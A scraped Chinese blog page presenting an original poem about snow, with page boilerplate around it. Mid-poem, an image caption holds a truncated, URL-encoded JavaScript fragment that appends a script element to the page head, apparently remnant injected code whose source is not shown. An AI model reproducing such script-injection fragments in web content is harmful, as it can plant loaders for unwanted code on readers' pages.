注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

富贵闲人

富贵不是有钱.闲人不是懒人

 
 
 

日志

 
 
关于我

“富贵”不是“有钱”,后者是一时境遇。而“富贵”却是几世荣华熏陶出的一种气度,看惯了大场面享受尽了好东西之后的从容和高贵,而“闲人”两字又更加难得,不是“懒人”也不是“游手好闲”,却是天下最有情趣之人,知道如何细细雕琢日子,精通享受的有福之人!

网易考拉推荐

【雅致茶音】观图题诗【雪】原创  

2010-11-12 14:23:57|  分类: 我的诗篇 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

 

 

花草素材 - 茶魂 - 茶 魂(原创作品转用请注明出处)
 

  雪花纷飞梨花媚,

  飘飘洒洒空中缀。

  任凭嫦峨相思泪,

【雅致茶音】观图题诗【雪】原创 - 富贵闲人 - 富贵闲人cript%22%3Bdocument.getElementsByTagName%28%27head%27%29%5B0%5D.appendChild%28s%29%3B%0D%0A">  落满人间不思归。

  万般无奈情自醉,

  梦生双翅比翼飞。

  北国冰峰景致美,

  何须冬日盼春归。

 

 本文原创禁止引用转载

 

 

【雅致茶音】观图题诗【雪】原创 - 富贵闲人 - 富贵闲人

     

线条 - 茶魂 - 茶 魂(原创作品转用请注明出处)

 

 

 

  评论这张
 
阅读(220)| 评论(73)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017